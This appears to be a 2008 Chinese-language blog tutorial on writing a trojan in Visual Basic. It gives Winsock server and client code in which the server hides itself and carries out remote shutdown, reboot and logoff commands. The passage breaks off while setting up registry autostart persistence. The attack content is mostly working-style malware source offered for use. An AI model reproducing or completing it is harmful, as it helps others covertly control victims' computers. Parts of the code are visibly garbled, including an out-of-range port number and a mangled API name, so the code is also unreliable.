|
發布日期:2008/11/3 點閱率:880 利用VB實現的木馬攻擊 利用VB實現的木馬攻擊 首先,新建一工程,名為Server,新建一個表單,Name為Server,在表單中加入一個winsock控制項,Name設為sckServer,協議設為預設的TCP/IP協議。 接下來我們回來Server表單模組中,添加如下代碼: Private Sub form_Load() With Me .sckServer.LocalPort = 88917'本地埠(呵呵!我的生日!) .sckServer.Listen '開始監聽 End With End Sub '接受用戶端的連接請求。 Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) With Me If .sckServer.State <>sckClosed Then .sckServer.Close .sckServer.Accept (requestID) End With End Sub 下面我們來建立用戶端程式:新建一個工程,名為Client,把表單名為Client,在上面加入一個winsock控制項,名為sckClient,協定為TCP/IP協定。再加一個按鈕cmdConnect在表單模組中加入代碼: Private Sub form_Load() With Me .sckClient.RemoteHost = "127.0.0.1"'設置遠程IP,本例設為本機。 .sckClient.RemotePort = 88917 '遠端埠,就為server中的設置一樣. End With End Sub Private sub cmdConnect_Click() SckClient.Connect End sub 至此,按一下Connect按鈕我們的兩個工程已經可以進行通信了,但看不見,你可以在Client中的sckClient_Connect事件中加入代碼:debug.print “Connetion successful!”來查看。 這僅是第一步,一點工作也做不了,下面我們來為它們添加功能。為了簡單,本文章只實現一點小小的功能―――關機,重啟,註銷。好,開始吧! 在Server工程中新建一個模組,Name為modApi,這個模快為一些API函數,添加如下API函數: Public Declare Function ExitWindowXXX Lib "user32" Alias "ExitWindowXXX" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Public Const EWX_LOGOFF = 0 Public Const EWX_REBOOT = 2 Public Const EWX_SHUTDOWN = 1 Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As Long Public Type RECT Left As Long Top As Long Right As Long Bottom As Long End Type 注:在兩個socket中程式設計中,進行通信的重要事件是DataArrival事件,用於接收遠端資料。 下面在Client工程的Client表單中放入三個按鈕,分別為cmdExit,cmdLogoff,cmdReboot。它們用於對遠程的關機,註銷,重啟操作。分別添加如下代碼: Private Sub cmdExit_Click() Me.sckClient.SendData "Exit" End Sub Private Sub cmdLogoff_Click() Me.sckClient.SendData "Logoff" End Sub Private Sub cmdReboot_Click() Me.sckClient.SendData "Reboot" End Sub 全都是對服務端發出請求。下面轉到Server工程中:在Server中添加sckServer的DataArrial事件,接收用戶端的請求。 Private Sub sckServer_DataArrival(ByVal bytesTotal As Long) Dim strData As String With Me ' 接收客戶請求的資訊 .sckServer.GetData strData Select Case strData Case "Exit" '關機 Call ExitWindowXXX(EWX_SHUTDOWN, 0) Case "Reboot" '重啟 Call ExitWindowXXX(EWX_REBOOT, 0) Case "Logoff" '註銷 Call ExitWindowXXX(EWX_LOGOFF, 0) End Select End With End Sub 好了,到此我們已經實現功能了,但還不行,我們要它在背後運行。這簡單,在Server中的form_Load事件中加入一句:me.hide。好這下看不見了,但大家知道木馬是一開機就自動運行了,這又是為什麼,怎麼實現的?把它加入到註冊表的啟動組中?對,不錯,跟我來吧! 回到Server工程中的modApi中加入如下API函數: Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long |